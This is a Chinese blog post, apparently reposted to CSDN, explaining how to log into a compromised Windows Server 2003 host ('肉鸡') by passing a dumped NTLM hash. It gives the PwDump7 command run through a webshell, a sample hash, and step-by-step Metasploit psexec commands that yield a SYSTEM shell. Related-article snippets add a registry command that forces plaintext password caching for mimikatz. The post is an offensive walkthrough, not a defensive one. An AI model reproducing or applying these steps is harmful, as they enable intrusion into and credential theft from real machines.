利用hash远程登陆系统

最新推荐文章于 2023-08-07 08:56:07 发布
最新推荐文章于 2023-08-07 08:56:07 发布
阅读量509 收藏
点赞数
原文链接:http://www.cnblogs.com/feizianquan/p/11113391.html
版权

有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录

我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统

1.利用抓哈希工具PwDump7.exe获取哈希

菜刀输入打开命令执行  PwDump7.exe>>1.txt

获取的哈希  

huwei:1010:759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82:::

这一段就是hash值165CD69A960EEF608596914B58F6DF82

放入放到md5解码里面没解出来

放到彩虹表里面也没跑出来

 

这个时候可以利用msf 了

打开kali 终端输入命令

msfconsole

输入模块利用

use exploit/windows/smb/psexec

show options 查看当前需要填写的信息

set rhost 肉鸡ip

set smbuser huwei

set smbpass 759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82

set run

shell

会反弹一个system权限cmdshell 

 

转载于:https://www.cnblogs.com/feizianquan/p/11113391.html

weixin_30648587
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Hash远程RDP登录
谢公子的博客
04-20 4305
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。 但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d
网页用户管理系统实现
01-05
在这个"网页用户管理系统实现"项目中,我们将探讨如何利用PHP和数据库来搭建用户注册、登录等功能。 首先,我们需要建立一个数据库来存储用户信息。在描述中提到的“第一步:创建student数据库”,这是系统的基础。...
kali下利用FreeRDP进行hash登录远程桌面
crowsec
08-07 1614
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
linux下抓管理员hash,Linux下抓取登陆用户密码神器mimipenguin
weixin_42298507的博客
05-12 279
windows下有Mimikatz,现在linux下有了mimipenguin,国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,弥补了Linux下密码抓取的空缺。编写思路来自流行的windows密码抓取神器mimikatz详情通过转储过程和提取那些包含明文密码可能性很高的行(hang),充分利用内存中的明文凭证。通过检查/etc/shadow...
linux密码 hash,实验吧Web-中-让我进去(Hash长度扩展攻击、加盐密码及Linux下hashpump的安装使用)...
weixin_29239279的博客
05-02 175
打开网页,测试开始,注入费老大劲,看了大佬的blog才知道怎么干。bp抓包,观察发现cookie中有个source=0,在repeater中修改为source=1,然go一下,出来了一段源代码。$flag = "XXXXXXXXXXXXXXXXXXXXXXX";$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for...
1、使用Hash直接登录Windows
Fly_鹏程万里
05-17 3021
环境攻击机   :  kali linux 2018                        192.168.11.144目标主机:Windows server 2003 R2          192.168.11.133主要用途这个可以用于后渗透测试阶段,当我们获取到一个系统的一个WEBshell之后,我们可以上传gethashes.exe到该目标系统,之后在目标系统中获取当前登录用户的...
关于Hash收邮件
把梦想放飞在蓝色的天空里...
04-06 330
在windows平台上使用NTLM Hash 收邮件,可以结合EWS接口,并在C++层IAT HOOK ncrypt.dll 导入的 bcrypt.dll.BCryptHashData函数。 这个函数包含了NTLM Hash验证的明文数据,抓到NTLM验证请求的时候,用服务端返回的Challenge 和已知的密码Hash 再把各种HASH重新计算一次填充到数据包中返回给服务端。 为什么要这么做?因为EWS 接口中没有带Hash的接口,只能先用一个错误的密码填充 ,然后在底层再重新用正确的HASH 填充。
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3189
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
轻量级的在线项目/任务协作系统远程办公协作
06-29
"轻量级的在线项目/任务协作系统远程办公协作"是解决这一需求的有效工具,它旨在提高团队效率,降低沟通成本,同时保持工作流程的灵活性。本文将深入探讨这种系统的构建和应用,特别是基于PHP的技术实现。 PHP是一...
互联网系统在线安全监测技术方案标书样本.doc
12-17
防止远程文件包含漏洞和CGI漏洞被利用,安全方案应确保对文件包含和CGI调用有严格的控制,避免恶意代码执行。 10. 监测与响应: 实时监控系统日志,快速发现异常行为,并建立有效的应急响应机制,一旦发生攻击,...
抓取HASH的10001种方法1
08-03
接着,提到了`wmic`命令行工具,它可以用于本地或远程执行命令,例如通过指定格式化的输出来列出或获取系统信息。在内部独白攻击(Internal Monologue Attack)中,通过SSPI调用NTLM认证并操纵挑战(Challenge)以...
远程控制软件编写之六1密码验证4
02-28
会话应该有时间限制,过期后需要重新登录,防止长时间未使用的连接被恶意利用。 6. **异常行为检测**:系统应能检测到异常登录尝试,如连续多次错误密码输入、来自不同地理位置的快速登录尝试等,并采取相应的应对...
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 4958
windows的RDP-hash登录利用 在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
使用Hash直接登录Windows
十年磨一剑,霜刃未曾试!
10-24 2642
首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH  C:\>net user wooyun test  The command completed successfully.  C:\>gethashes.exe $local  1:1007:C2265B23734E0DACAAD3B435B
Metasploit使用hash直接登录系统
ytfhjhv的博客
01-24 354
Metasploit使用hash直接登录系统
Metasploit使用Hash直接登录Windows
jackey3Lin的专栏
10-21 2438
首先,在本地主机(假设为目标主机) 新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user isosky test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404
WINDOWS 窃取hash实现远程登录
The current road is different, love needs to distinguish between right and wrong
11-18 874
前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Windows常用用户 SYSTEM: #本地机器上拥有最高权限的用户。 Administrator: #本地机器上拥有最高权限的用户。 Guest: # 只拥有相对较少的权限,默认被禁用。 二、Windows密码安全 1. Quarks P...
2024-2025-1学期选课第一轮停开课程.xlsx
最新发布
07-09
2024-2025-1学期选课第一轮停开课程.xlsx
如何利用hash表存储稀疏矩阵
04-21
通常,利用hash表来实现稀疏矩阵的存储是一种常见而有效的方法。这种方法可以将稀疏矩阵中的非零元素存储在一个hash表中,而将零元素省略掉。hash表中的每个键值对代表矩阵中的一个非零元素,其中键存储该元素在矩阵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值